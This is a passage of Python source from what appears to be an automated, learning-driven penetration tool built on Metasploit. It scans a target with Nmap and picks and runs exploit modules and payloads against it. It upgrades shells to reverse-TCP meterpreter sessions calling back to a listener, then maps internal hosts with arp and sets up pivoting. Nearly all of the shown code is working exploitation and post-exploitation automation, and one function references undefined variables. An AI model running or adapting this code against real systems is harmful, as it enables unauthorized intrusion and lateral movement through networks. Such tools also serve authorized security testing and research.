self.os_real == 7 and os_type in ['hpux', 'unix', 'multi']: 798 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 799 | elif self.os_real == 8 and os_type in ['freebsd', 'unix', 'bsdi', 'multi']: 800 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 801 | elif self.os_real == 9 and os_type in ['firefox', 'multi']: 802 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 803 | elif self.os_real == 10 and os_type in ['dialup', 'multi']: 804 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 805 | elif self.os_real == 11 and os_type in ['bsdi', 'unix', 'freebsd', 'multi']: 806 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 807 | elif self.os_real == 12 and os_type in ['apple_ios', 'unix', 'osx', 'multi']: 808 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 809 | elif self.os_real == 13 and os_type in ['android', 'linux', 'multi']: 810 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 811 | elif self.os_real == 14 and os_type in ['aix', 'unix', 'multi']: 812 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 813 | elif self.os_real == 15: 814 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 815 | return osmatch_module_list 816 | 817 | # Parse. 818 | def cutting_strings(self, pattern, target): 819 | return re.findall(pattern, target) 820 | 821 | # Normalization. 822 | def normalization(self, target_idx): 823 | if target_idx == ST_OS_TYPE: 824 | os_num = int(self.state[ST_OS_TYPE]) 825 | os_num_mean = len(self.os_type) / 2 826 | self.state[ST_OS_TYPE] = (os_num - os_num_mean) / os_num_mean 827 | if target_idx == ST_SERV_NAME: 828 | service_num = self.state[ST_SERV_NAME] 829 | service_num_mean = len(self.service_list) / 2 830 | self.state[ST_SERV_NAME] = (service_num - service_num_mean) / service_num_mean 831 | elif target_idx == ST_MODULE: 832 | prompt_num = self.state[ST_MODULE] 833 | prompt_num_mean = len(com_exploit_list) / 2 834 | self.state[ST_MODULE] = (prompt_num - prompt_num_mean) / prompt_num_mean 835 | 836 | # Execute Nmap. 
837 | def execute_nmap(self, rhost, command, timeout): 838 | self.util.print_message(NOTE, 'Execute Nmap against {}'.format(rhost)) 839 | if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False: 840 | # Execute Nmap. 841 | self.util.print_message(OK, '{}'.format(command)) 842 | self.util.print_message(OK, 'Start time: {}'.format(self.util.get_current_date())) 843 | _ = self.client.call('console.write', [self.client.console_id, command]) 844 | 845 | time.sleep(3.0) 846 | time_count = 0 847 | while True: 848 | # Judgement of Nmap finishing. 849 | ret = self.client.call('console.read', [self.client.console_id]) 850 | try: 851 | if (time_count % 5) == 0: 852 | self.util.print_message(OK, 'Port scanning: {} [Elapsed time: {} s]'.format(rhost, time_count)) 853 | self.client.keep_alive() 854 | if timeout == time_count: 855 | self.client.termination(self.client.console_id) 856 | self.util.print_message(OK, 'Timeout : {}'.format(command)) 857 | self.util.print_message(OK, 'End time : {}'.format(self.util.get_current_date())) 858 | break 859 | 860 | status = ret.get(b'busy') 861 | if status is False: 862 | self.util.print_message(OK, 'End time : {}'.format(self.util.get_current_date())) 863 | time.sleep(5.0) 864 | break 865 | except Exception as e: 866 | self.util.print_exception(e, 'Failed: {}'.format(command)) 867 | time.sleep(1.0) 868 | time_count += 1 869 | 870 | _ = self.client.call('console.destroy', [self.client.console_id]) 871 | ret = self.client.call('console.create', []) 872 | try: 873 | self.client.console_id = ret.get(b'id') 874 | except Exception as e: 875 | self.util.print_exception(e, 'Failed: console.create') 876 | exit(1) 877 | _ = self.client.call('console.read', [self.client.console_id]) 878 | else: 879 | self.util.print_message(OK, 'Nmap already scanned.') 880 | 881 | # Get port list from Nmap's XML result. 882 | def get_port_list(self, nmap_result_file, rhost): 883 | self.util.print_message(NOTE, 'Get port list from {}.'.format(nmap_result_file)) 884 | global com_port_list 885 | port_list = [] 886 | proto_list = [] 887 | info_list = [] 888 | if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False: 889 | nmap_result = '' 890 | cat_cmd = 'cat ' + nmap_result_file + '\n' 891 | _ = self.client.call('console.write', [self.client.console_id, cat_cmd]) 892 | time.sleep(3.0) 893 | time_count = 0 894 | while True: 895 | # Judgement of 'services' command finishing. 896 | ret = self.client.call('console.read', [self.client.console_id]) 897 | try: 898 | if self.timeout == time_count: 899 | self.client.termination(self.client.console_id) 900 | self.util.print_message(OK, 'Timeout: "{}"'.format(cat_cmd)) 901 | break 902 | 903 | nmap_result += ret.get(b'data').decode('utf-8') 904 | status = ret.get(b'busy') 905 | if status is False: 906 | break 907 | except Exception as e: 908 | self.util.print_exception(e, 'Failed: console.read') 909 | time.sleep(1.0) 910 | time_count += 1 911 | 912 | # Get port, protocol, information from XML file. 
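            # The nmap_result text accumulated above is Nmap's XML report; each open
            # port appears roughly as
            #
            #   <port protocol="tcp" portid="22">
            #     <state state="open"/>
            #     <service name="ssh" product="OpenSSH" version="4.7p1" extrainfo="protocol 2.0"/>
            #   </port>
            #
            # and OS detection adds <osmatch>/<osclass osfamily="Linux"> elements.
            # The parsing below relies only on these attributes.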
913 | port_list = [] 914 | proto_list = [] 915 | info_list = [] 916 | bs = BeautifulSoup(nmap_result, 'lxml') 917 | ports = bs.find_all('port') 918 | for idx, port in enumerate(ports): 919 | port_list.append(str(port.attrs['portid'])) 920 | proto_list.append(port.attrs['protocol']) 921 | 922 | for obj_child in port.contents: 923 | if obj_child.name == 'service': 924 | temp_info = '' 925 | if 'product' in obj_child.attrs: 926 | temp_info += obj_child.attrs['product'] + ' ' 927 | if 'version' in obj_child.attrs: 928 | temp_info += obj_child.attrs['version'] + ' ' 929 | if 'extrainfo' in obj_child.attrs: 930 | temp_info += obj_child.attrs['extrainfo'] 931 | if temp_info != '': 932 | info_list.append(temp_info) 933 | else: 934 | info_list.append('unknown') 935 | # Display getting port information. 936 | self.util.print_message(OK, 'Getting {}/{} info: {}'.format(str(port.attrs['portid']), 937 | port.attrs['protocol'], 938 | info_list[idx])) 939 | 940 | if len(port_list) == 0: 941 | self.util.print_message(WARNING, 'No open port.') 942 | self.util.print_message(WARNING, 'Shutdown Deep Exploit...') 943 | self.client.termination(self.client.console_id) 944 | exit(1) 945 | 946 | # Update com_port_list. 947 | com_port_list = port_list 948 | 949 | # Get OS name from XML file. 950 | some_os = bs.find_all('osmatch') 951 | os_name = 'unknown' 952 | for obj_os in some_os: 953 | for obj_child in obj_os.contents: 954 | if obj_child.name == 'osclass' and 'osfamily' in obj_child.attrs: 955 | os_name = (obj_child.attrs['osfamily']).lower() 956 | break 957 | 958 | # Set OS to state. 959 | for (idx, os_type) in enumerate(self.os_type): 960 | if os_name in os_type: 961 | self.os_real = idx 962 | else: 963 | # Get target host information from local file. 964 | saved_file = os.path.join(self.data_path, 'target_info_' + rhost + '.json') 965 | self.util.print_message(OK, 'Loaded target tree from : {}'.format(saved_file)) 966 | fin = codecs.open(saved_file, 'r', 'utf-8') 967 | target_tree = json.loads(fin.read().replace('\0', '')) 968 | fin.close() 969 | key_list = list(target_tree.keys()) 970 | for key in key_list[2:]: 971 | port_list.append(str(key)) 972 | 973 | # Update com_port_list. 974 | com_port_list = port_list 975 | 976 | return port_list, proto_list, info_list 977 | 978 | # Get Exploit module list. 979 | def get_exploit_list(self): 980 | self.util.print_message(NOTE, 'Get exploit list.') 981 | all_exploit_list = [] 982 | if os.path.exists(os.path.join(self.data_path, 'exploit_list.csv')) is False: 983 | self.util.print_message(OK, 'Loading exploit list from Metasploit.') 984 | 985 | # Get Exploit module list. 986 | all_exploit_list = [] 987 | exploit_candidate_list = self.client.get_module_list('exploit') 988 | for idx, exploit in enumerate(exploit_candidate_list): 989 | module_info = self.client.get_module_info('exploit', exploit) 990 | time.sleep(0.1) 991 | try: 992 | rank = module_info[b'rank'].decode('utf-8') 993 | if rank in {'excellent', 'great', 'good'}: 994 | all_exploit_list.append(exploit) 995 | self.util.print_message(OK, '{}/{} Loaded exploit: {}'.format(str(idx + 1), 996 | len(exploit_candidate_list), 997 | exploit)) 998 | else: 999 | self.util.print_message(WARNING, '{}/{} {} module is danger (rank: {}). Can\'t load.' 1000 | .format(str(idx + 1), len(exploit_candidate_list), exploit, rank)) 1001 | except Exception as e: 1002 | self.util.print_exception(e, 'Failed: module.info') 1003 | exit(1) 1004 | 1005 | # Save Exploit module list to local file. 
1006 | self.util.print_message(OK, 'Total loaded exploit module: {}'.format(str(len(all_exploit_list)))) 1007 | fout = codecs.open(os.path.join(self.data_path, 'exploit_list.csv'), 'w', 'utf-8') 1008 | for item in all_exploit_list: 1009 | fout.write(item + '\n') 1010 | fout.close() 1011 | self.util.print_message(OK, 'Saved exploit list.') 1012 | else: 1013 | # Get exploit module list from local file. 1014 | local_file = os.path.join(self.data_path, 'exploit_list.csv') 1015 | self.util.print_message(OK, 'Loaded exploit list from : {}'.format(local_file)) 1016 | fin = codecs.open(local_file, 'r', 'utf-8') 1017 | for item in fin: 1018 | all_exploit_list.append(item.rstrip('\n')) 1019 | fin.close() 1020 | return all_exploit_list 1021 | 1022 | # Get payload list. 1023 | def get_payload_list(self, module_name='', target_num=''): 1024 | self.util.print_message(NOTE, 'Get payload list.') 1025 | all_payload_list = [] 1026 | if os.path.exists(os.path.join(self.data_path, 'payload_list.csv')) is False or module_name != '': 1027 | self.util.print_message(OK, 'Loading payload list from Metasploit.') 1028 | 1029 | # Get payload list. 1030 | payload_list = [] 1031 | if module_name == '': 1032 | # Get all Payloads. 1033 | payload_list = self.client.get_module_list('payload') 1034 | 1035 | # Save payload list to local file. 1036 | fout = codecs.open(os.path.join(self.data_path, 'payload_list.csv'), 'w', 'utf-8') 1037 | for idx, item in enumerate(payload_list): 1038 | time.sleep(0.1) 1039 | self.util.print_message(OK, '{}/{} Loaded payload: {}'.format(str(idx + 1), 1040 | len(payload_list), 1041 | item)) 1042 | fout.write(item + '\n') 1043 | fout.close() 1044 | self.util.print_message(OK, 'Saved payload list.') 1045 | elif target_num == '': 1046 | # Get payload that compatible exploit module. 1047 | payload_list = self.client.get_compatible_payload_list(module_name) 1048 | else: 1049 | # Get payload that compatible target. 1050 | payload_list = self.client.get_target_compatible_payload_list(module_name, target_num) 1051 | else: 1052 | # Get payload list from local file. 1053 | local_file = os.path.join(self.data_path, 'payload_list.csv') 1054 | self.util.print_message(OK, 'Loaded payload list from : {}'.format(local_file)) 1055 | payload_list = [] 1056 | fin = codecs.open(local_file, 'r', 'utf-8') 1057 | for item in fin: 1058 | payload_list.append(item.rstrip('\n')) 1059 | fin.close() 1060 | return payload_list 1061 | 1062 | # Reset state (s). 1063 | def reset_state(self, exploit_tree, target_tree): 1064 | # Randomly select target port number. 1065 | port_num = str(com_port_list[random.randint(0, len(com_port_list) - 1)]) 1066 | service_name = target_tree[port_num]['prod_name'] 1067 | if service_name == 'unknown': 1068 | return True, None, None, None, None 1069 | 1070 | # Initialize state. 1071 | self.state = [] 1072 | 1073 | # Set os type to state. 1074 | self.os_real = target_tree['os_type'] 1075 | self.state.insert(ST_OS_TYPE, target_tree['os_type']) 1076 | self.normalization(ST_OS_TYPE) 1077 | 1078 | # Set product name (index) to state. 1079 | for (idx, service) in enumerate(self.service_list): 1080 | if service == service_name: 1081 | self.state.insert(ST_SERV_NAME, idx) 1082 | break 1083 | self.normalization(ST_SERV_NAME) 1084 | 1085 | # Set version to state. 1086 | self.state.insert(ST_SERV_VER, target_tree[port_num]['version']) 1087 | 1088 | # Set exploit module type (index) to state. 1089 | module_list = target_tree[port_num]['exploit'] 1090 | 1091 | # Randomly select exploit module. 
1092 | module_name = '' 1093 | module_info = [] 1094 | while True: 1095 | module_name = module_list[random.randint(0, len(module_list) - 1)] 1096 | for (idx, exploit) in enumerate(com_exploit_list): 1097 | exploit = 'exploit/' + exploit 1098 | if exploit == module_name: 1099 | self.state.insert(ST_MODULE, idx) 1100 | break 1101 | self.normalization(ST_MODULE) 1102 | break 1103 | 1104 | # Randomly select target. 1105 | module_name = module_name[8:] 1106 | target_list = exploit_tree[module_name]['target_list'] 1107 | targets_num = target_list[random.randint(0, len(target_list) - 1)] 1108 | self.state.insert(ST_TARGET, int(targets_num)) 1109 | 1110 | # Set exploit stage to state. 1111 | # self.state.insert(ST_STAGE, S_NORMAL) 1112 | 1113 | # Set target information for display. 1114 | target_info = {'protocol': target_tree[port_num]['protocol'], 1115 | 'target_path': target_tree[port_num]['target_path'], 'prod_name': service_name, 1116 | 'version': target_tree[port_num]['version'], 'exploit': module_name} 1117 | if com_indicate_flag: 1118 | port_num = target_tree['origin_port'] 1119 | target_info['port'] = str(port_num) 1120 | 1121 | return False, self.state, exploit_tree[module_name]['targets'][targets_num], target_list, target_info 1122 | 1123 | # Get state (s). 1124 | def get_state(self, exploit_tree, target_tree, port_num, exploit, target): 1125 | # Get product name. 1126 | service_name = target_tree[port_num]['prod_name'] 1127 | if service_name == 'unknown': 1128 | return True, None, None, None 1129 | 1130 | # Initialize state. 1131 | self.state = [] 1132 | 1133 | # Set os type to state. 1134 | self.os_real = target_tree['os_type'] 1135 | self.state.insert(ST_OS_TYPE, target_tree['os_type']) 1136 | self.normalization(ST_OS_TYPE) 1137 | 1138 | # Set product name (index) to state. 1139 | for (idx, service) in enumerate(self.service_list): 1140 | if service == service_name: 1141 | self.state.insert(ST_SERV_NAME, idx) 1142 | break 1143 | self.normalization(ST_SERV_NAME) 1144 | 1145 | # Set version to state. 1146 | self.state.insert(ST_SERV_VER, target_tree[port_num]['version']) 1147 | 1148 | # Select exploit module (index). 1149 | for (idx, temp_exploit) in enumerate(com_exploit_list): 1150 | temp_exploit = 'exploit/' + temp_exploit 1151 | if exploit == temp_exploit: 1152 | self.state.insert(ST_MODULE, idx) 1153 | break 1154 | self.normalization(ST_MODULE) 1155 | 1156 | # Select target. 1157 | self.state.insert(ST_TARGET, int(target)) 1158 | 1159 | # Set exploit stage to state. 1160 | # self.state.insert(ST_STAGE, S_NORMAL) 1161 | 1162 | # Set target information for display. 1163 | target_info = {'protocol': target_tree[port_num]['protocol'], 1164 | 'target_path': target_tree[port_num]['target_path'], 1165 | 'prod_name': service_name, 'version': target_tree[port_num]['version'], 1166 | 'exploit': exploit[8:], 'target': target} 1167 | if com_indicate_flag: 1168 | port_num = target_tree['origin_port'] 1169 | target_info['port'] = str(port_num) 1170 | 1171 | return False, self.state, exploit_tree[exploit[8:]]['targets'][target], target_info 1172 | 1173 | # Get available payload list (convert from string to number). 1174 | def get_available_actions(self, payload_list): 1175 | payload_num_list = [] 1176 | for self_payload in payload_list: 1177 | for (idx, payload) in enumerate(com_payload_list): 1178 | if payload == self_payload: 1179 | payload_num_list.append(idx) 1180 | break 1181 | return payload_num_list 1182 | 1183 | # Show banner of successfully exploitation. 
1184 | def show_banner_bingo(self, prod_name, exploit, payload, sess_type, delay_time=2.0): 1185 | metric = {'service': [], 1186 | 'time': []} 1187 | banner = u""" 1188 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1189 |     ██████╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██╗██╗██╗ 1190 | ██╔══██╗██║████╗ ██║██╔════╝ ██╔═══██╗██║██║██║ 1191 | ██████╔╝██║██╔██╗ ██║██║ ███╗██║ ██║██║██║██║ 1192 | ██╔══██╗██║██║╚██╗██║██║ ██║██║ ██║╚═╝╚═╝╚═╝ 1193 | ██████╔╝██║██║ ╚████║╚██████╔╝╚██████╔╝██╗██╗██╗ 1194 | ╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝╚═╝╚═╝ 1195 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1196 | """ + prod_name + ' ' + exploit + ' ' + payload + ' ' + sess_type + '\n' 1197 | self.util.print_message(NONE, banner) 1198 | message = 'bingo!! ' 1199 | metric['service'].append(prod_name) 1200 | bingotime = time.time() - t1 1201 | metric['time'].append(bingotime) 1202 | dataframe = pd.DataFrame(metric) 1203 | dataframe.to_csv(file, mode='a') 1204 | #time.sleep(delay_time) 1205 | 1206 | # Set Metasploit options. 1207 | def set_options(self, target_info, target, selected_payload, exploit_tree): 1208 | options = exploit_tree[target_info['exploit']]['options'] 1209 | key_list = options.keys() 1210 | option = {} 1211 | for key in key_list: 1212 | if options[key]['required'] is True: 1213 | sub_key_list = options[key].keys() 1214 | if 'default' in sub_key_list: 1215 | # If "user_specify" is not null, set "user_specify" value to the key. 1216 | if options[key]['user_specify'] == '': 1217 | option[key] = options[key]['default'] 1218 | else: 1219 | option[key] = options[key]['user_specify'] 1220 | else: 1221 | option[key] = '0' 1222 | 1223 | # Set target path/uri/dir etc. 1224 | if len([s for s in self.path_collection if s in key.lower()]) != 0: 1225 | option[key] = target_info['target_path'] 1226 | 1227 | option['RHOST'] = self.rhost 1228 | if self.port_div_symbol in target_info['port']: 1229 | tmp_port = target_info['port'].split(self.port_div_symbol) 1230 | option['RPORT'] = int(tmp_port[0]) 1231 | else: 1232 | option['RPORT'] = int(target_info['port']) 1233 | option['TARGET'] = int(target) 1234 | if selected_payload != '': 1235 | option['PAYLOAD'] = selected_payload 1236 | return option 1237 | 1238 | # Execute exploit. 1239 | def execute_exploit(self, action, thread_name, thread_type, target_list, target_info, step, exploit_tree, frame=0): 1240 | metric = {'state': [], 1241 | 'action': []} 1242 | # Set target. 1243 | target = '' 1244 | if thread_type == 'learning': 1245 | target = str(self.state[ST_TARGET]) 1246 | else: 1247 | # If testing, 'target_list' is target number (not list). 1248 | target = target_list 1249 | # If trial exceed maximum number of trials, finish trial at current episode. 1250 | if step > self.max_attempt - 1: 1251 | return self.state, None, True, {} 1252 | 1253 | # Set payload. 1254 | selected_payload = '' 1255 | if action != 'no payload': 1256 | selected_payload = com_payload_list[action] 1257 | else: 1258 | # No payload 1259 | selected_payload = '' 1260 | 1261 | # Set options. 1262 | option = self.set_options(target_info, target, selected_payload, exploit_tree) 1263 | 1264 | # Execute exploit. 1265 | reward = 0 1266 | message = '' 1267 | session_list = {} 1268 | done = False 1269 | job_id, uuid = self.client.execute_module('exploit', target_info['exploit'], option) 1270 | if uuid is not None: 1271 | # Check status of running module. 
1272 | _ = self.check_running_module(job_id, uuid) 1273 | sessions = self.client.get_session_list() 1274 | key_list = sessions.keys() 1275 | if len(key_list) != 0: 1276 | # Probably successfully of exploitation (but unsettled). 1277 | for key in key_list: 1278 | exploit_uuid = sessions[key][b'exploit_uuid'].decode('utf-8') 1279 | if uuid == exploit_uuid: 1280 | # Successfully of exploitation. 1281 | session_id = int(key) 1282 | session_type = sessions[key][b'type'].decode('utf-8') 1283 | session_port = str(sessions[key][b'session_port']) 1284 | session_exploit = sessions[key][b'via_exploit'].decode('utf-8') 1285 | session_payload = sessions[key][b'via_payload'].decode('utf-8') 1286 | module_info = self.client.get_module_info('exploit', session_exploit) 1287 | 1288 | # Checking feasibility of post-exploitation. 1289 | # status, server_job_id, new_session_id = self.check_post_exploit(session_id, session_type) 1290 | # status = self.check_payload_type(session_payload, session_type) 1291 | status = True 1292 | 1293 | if status: 1294 | # Successful of post-exploitation. 1295 | reward = R_GREAT 1296 | done = True 1297 | message = 'bingo!! ' 1298 | 1299 | # Display banner. 1300 | self.show_banner_bingo(target_info['prod_name'], 1301 | session_exploit, 1302 | session_payload, 1303 | session_type) 1304 | else: 1305 | # Failure of post-exploitation. 1306 | reward = R_GOOD 1307 | message = 'misfire ' 1308 | 1309 | # Gather reporting items. 1310 | vuln_name = module_info[b'name'].decode('utf-8') 1311 | description = module_info[b'description'].decode('utf-8') 1312 | ref_list = module_info[b'references'] 1313 | reference = '' 1314 | for item in ref_list: 1315 | reference += '[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode('utf-8') + '@@' 1316 | 1317 | # Save reporting item for report. 1318 | if thread_type == 'learning': 1319 | with codecs.open(os.path.join(self.report_train_path, 1320 | thread_name + '.csv'), 'a', 'utf-8') as fout: 1321 | bingo = [self.util.get_current_date(), 1322 | self.rhost, 1323 | session_port, 1324 | target_info['protocol'], 1325 | target_info['prod_name'], 1326 | str(target_info['version']), 1327 | vuln_name, 1328 | description, 1329 | session_type, 1330 | session_exploit, 1331 | target, 1332 | session_payload, 1333 | reference] 1334 | writer = csv.writer(fout) 1335 | writer.writerow(bingo) 1336 | else: 1337 | with codecs.open(os.path.join(self.report_test_path, 1338 | thread_name + '.csv'), 'a', 'utf-8') as fout: 1339 | bingo = [self.util.get_current_date(), 1340 | self.rhost, 1341 | session_port, 1342 | self.source_host, 1343 | target_info['protocol'], 1344 | target_info['prod_name'], 1345 | str(target_info['version']), 1346 | vuln_name, 1347 | description, 1348 | session_type, 1349 | session_exploit, 1350 | target, 1351 | session_payload, 1352 | reference] 1353 | writer = csv.writer(fout) 1354 | writer.writerow(bingo) 1355 | 1356 | # Shutdown multi-handler for post-exploitation. 1357 | # if server_job_id is not None: 1358 | # self.client.stop_job(server_job_id) 1359 | 1360 | # Disconnect session. 1361 | if thread_type == 'learning': 1362 | self.client.stop_session(session_id) 1363 | # self.client.stop_session(new_session_id) 1364 | self.client.stop_meterpreter_session(session_id) 1365 | # self.client.stop_meterpreter_session(new_session_id) 1366 | # Create session list for post-exploitation. 
1367 | else: 1368 | # self.client.stop_session(new_session_id) 1369 | # self.client.stop_meterpreter_session(new_session_id) 1370 | session_list['id'] = session_id 1371 | session_list['type'] = session_type 1372 | session_list['port'] = session_port 1373 | session_list['exploit'] = session_exploit 1374 | session_list['target'] = target 1375 | session_list['payload'] = session_payload 1376 | break 1377 | else: 1378 | # Failure exploitation. 1379 | reward = R_BAD 1380 | message = 'failure ' 1381 | else: 1382 | # Failure exploitation. 1383 | reward = R_BAD 1384 | message = 'failure ' 1385 | else: 1386 | # Time out or internal error of Metasploit. 1387 | done = True 1388 | reward = R_BAD 1389 | message = 'time out' 1390 | 1391 | # Output result to console. 1392 | if thread_type == 'learning': 1393 | self.util.print_message(OK, '{0:04d}/{1:04d} : {2:03d}/{3:03d} {4} reward:{5} {6} {7} ({8}/{9}) ' 1394 | '{10} | {11} | {12} | {13}'.format(frame, 1395 | MAX_TRAIN_NUM, 1396 | step, 1397 | MAX_STEPS, 1398 | thread_name, 1399 | str(reward), 1400 | message, 1401 | self.rhost, 1402 | target_info['protocol'], 1403 | target_info['port'], 1404 | target_info['prod_name'], 1405 | target_info['exploit'], 1406 | selected_payload, 1407 | target)) 1408 | else: 1409 | self.util.print_message(OK, '{0}/{1} {2} {3} ({4}/{5}) ' 1410 | '{6} | {7} | {8} | {9}'.format(step+1, 1411 | self.max_attempt, 1412 | message, 1413 | self.rhost, 1414 | target_info['protocol'], 1415 | target_info['port'], 1416 | target_info['prod_name'], 1417 | target_info['exploit'], 1418 | selected_payload, 1419 | target)) 1420 | 1421 | # Set next stage of exploitation. 1422 | targets_num = 0 1423 | if thread_type == 'learning' and len(target_list) != 0: 1424 | targets_num = random.randint(0, len(target_list) - 1) 1425 | self.state[ST_TARGET] = targets_num 1426 | ''' 1427 | if thread_type == 'learning' and len(target_list) != 0: 1428 | if reward == R_BAD and self.state[ST_STAGE] == S_NORMAL: 1429 | # Change status of target. 1430 | self.state[ST_TARGET] = random.randint(0, len(target_list) - 1) 1431 | elif reward == R_GOOD: 1432 | # Change status of exploitation stage (Fix target). 1433 | self.state[ST_STAGE] = S_EXPLOIT 1434 | else: 1435 | # Change status of post-exploitation stage (Goal). 1436 | self.state[ST_STAGE] = S_PEXPLOIT 1437 | ''' 1438 | 1439 | return self.state, reward, done, session_list 1440 | 1441 | # Check possibility of post exploit. 1442 | def check_post_exploit(self, session_id, session_type): 1443 | new_session_id = 0 1444 | status = False 1445 | job_id = None 1446 | if session_type == 'shell' or session_type == 'powershell': 1447 | # Upgrade session from shell to meterpreter. 1448 | upgrade_result, job_id, lport = self.upgrade_shell(session_id) 1449 | if upgrade_result == 'success': 1450 | sessions = self.client.get_session_list() 1451 | session_list = list(sessions.keys()) 1452 | for sess_idx in session_list: 1453 | if session_id < sess_idx and sessions[sess_idx][b'type'].lower() == b'meterpreter': 1454 | status = True 1455 | new_session_id = sess_idx 1456 | break 1457 | else: 1458 | status = False 1459 | elif session_type == 'meterpreter': 1460 | status = True 1461 | else: 1462 | status = False 1463 | return status, job_id, new_session_id 1464 | 1465 | # Check payload type. 
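    # check_payload_type() below uses a simple heuristic: payload paths with more
    # than one '/' (e.g. 'windows/meterpreter/reverse_tcp') are treated as staged
    # (stager + stage), anything else (e.g. 'windows/shell_bind_tcp') as a single;
    # meterpreter sessions always pass. This mirrors the R_GREAT / R_GOOD reward
    # split defined at the top of the file, although the call site in
    # execute_exploit() currently short-circuits the check to True.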
1466 | def check_payload_type(self, session_payload, session_type): 1467 | status = None 1468 | if session_type == 'shell' or session_type == 'powershell': 1469 | # Check type: singles, stagers, stages 1470 | if session_payload.count('/') > 1: 1471 | # Stagers, Stages. 1472 | status = True 1473 | else: 1474 | # Singles. 1475 | status = False 1476 | elif session_type == 'meterpreter': 1477 | status = True 1478 | else: 1479 | status = False 1480 | return status 1481 | 1482 | # Execute post exploit. 1483 | def execute_post_exploit(self, session_id, session_type): 1484 | internal_ip_list = [] 1485 | if session_type == 'shell' or session_type == 'powershell': 1486 | # Upgrade session from shell to meterpreter. 1487 | upgrade_result, _, _ = self.upgrade_shell(session_id) 1488 | if upgrade_result == 'success': 1489 | sessions = self.client.get_session_list() 1490 | session_list = list(sessions.keys()) 1491 | for sess_idx in session_list: 1492 | if session_id < sess_idx and sessions[sess_idx][b'type'].lower() == b'meterpreter': 1493 | self.util.print_message(NOTE, 'Successful: Upgrade.') 1494 | session_id = sess_idx 1495 | 1496 | # Search other servers in internal network. 1497 | internal_ip_list, _ = self.get_internal_ip(session_id) 1498 | if len(internal_ip_list) == 0: 1499 | self.util.print_message(WARNING, 'Internal server is not found.') 1500 | else: 1501 | # Pivoting. 1502 | self.util.print_message(OK, 'Internal server list.\n{}'.format(internal_ip_list)) 1503 | self.set_pivoting(session_id, internal_ip_list) 1504 | break 1505 | else: 1506 | self.util.print_message(WARNING, 'Failure: Upgrade session from shell to meterpreter.') 1507 | elif session_type == 'meterpreter': 1508 | # Search other servers in internal network. 1509 | internal_ip_list, _ = self.get_internal_ip(session_id) 1510 | if len(internal_ip_list) == 0: 1511 | self.util.print_message(WARNING, 'Internal server is not found.') 1512 | else: 1513 | # Pivoting. 1514 | self.util.print_message(OK, 'Internal server list.\n{}'.format(internal_ip_list)) 1515 | self.set_pivoting(session_id, internal_ip_list) 1516 | else: 1517 | self.util.print_message(WARNING, 'Unknown session type: {}.'.format(session_type)) 1518 | return internal_ip_list 1519 | 1520 | # Upgrade session from shell to meterpreter. 1521 | def upgrade_shell(self, session_id): 1522 | # Upgrade shell session to meterpreter. 1523 | self.util.print_message(NOTE, 'Upgrade session from shell to meterpreter.') 1524 | payload = '' 1525 | # TODO: examine payloads each OS systems. 1526 | if self.os_real == 0: 1527 | payload = 'windows/meterpreter/reverse_tcp' 1528 | elif self.os_real == 3: 1529 | payload = 'osx/x64/meterpreter_reverse_tcp' 1530 | else: 1531 | payload = 'linux/x86/meterpreter_reverse_tcp' 1532 | 1533 | # Launch multi handler. 1534 | module = 'exploit/multi/handler' 1535 | lport = random.randint(10001, 65535) 1536 | option = {'LHOST': self.lhost, 'LPORT': lport, 'PAYLOAD': payload, 'TARGET': 0} 1537 | job_id, uuid = self.client.execute_module('exploit', module, option) 1538 | time.sleep(0.5) 1539 | if uuid is None: 1540 | self.util.print_message(FAIL, 'Failure executing module: {}'.format(module)) 1541 | return 'failure', job_id, lport 1542 | 1543 | # Execute upgrade. 1544 | status = self.client.upgrade_shell_session(session_id, self.lhost, lport) 1545 | return status, job_id, lport 1546 | 1547 | # Check status of running module. 1548 | def check_running_module(self, job_id, uuid): 1549 | # Waiting job to finish. 
1550 | time_count = 0 1551 | while True: 1552 | job_id_list = self.client.get_job_list() 1553 | if job_id in job_id_list: 1554 | time.sleep(1) 1555 | else: 1556 | return True 1557 | if self.timeout == time_count: 1558 | self.client.stop_job(str(job_id)) 1559 | self.util.print_message(WARNING, 'Timeout: job_id={}, uuid={}'.format(job_id, uuid)) 1560 | return False 1561 | time_count += 1 1562 | 1563 | # Get internal ip addresses. 1564 | def get_internal_ip(self, session_id): 1565 | # Execute "arp" of Meterpreter command. 1566 | self.util.print_message(OK, 'Searching internal servers...') 1567 | cmd = 'arp\n' 1568 | _ = self.client.execute_meterpreter(session_id, cmd) 1569 | time.sleep(3.0) 1570 | data = self.client.get_meterpreter_result(session_id) 1571 | if (data is None) or ('unknown command' in data.lower()): 1572 | self.util.print_message(FAIL, 'Failed: Get meterpreter result') 1573 | return [], False 1574 | self.util.print_message(OK, 'Result of arp: \n{}'.format(data)) 1575 | regex_pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).*[a-z0-9]{2}:[a-z0-9]{2}:[a-z0-9]{2}:[a-z0-9]{2}' 1576 | temp_list = self.cutting_strings(regex_pattern, data) 1577 | internal_ip_list = [] 1578 | for ip_addr in temp_list: 1579 | if ip_addr != self.lhost: 1580 | internal_ip_list.append(ip_addr) 1581 | return list(set(internal_ip_list)), True 1582 | 1583 | # Get subnet masks. 1584 | def get_subnet(self, session_id, internal_ip): 1585 | cmd = 'run get_local_subnets\n' 1586 | _ = self.client.execute_meterpreter(session_id, cmd) 1587 | time.sleep(3.0) 1588 | data = self.client.get_meterpreter_result(session_id) 1589 | if data is not None: 1590 | self.util.print_message(OK, 'Result of get_local_subnets: \n{}'.format(data)) 1591 | regex_pattern = 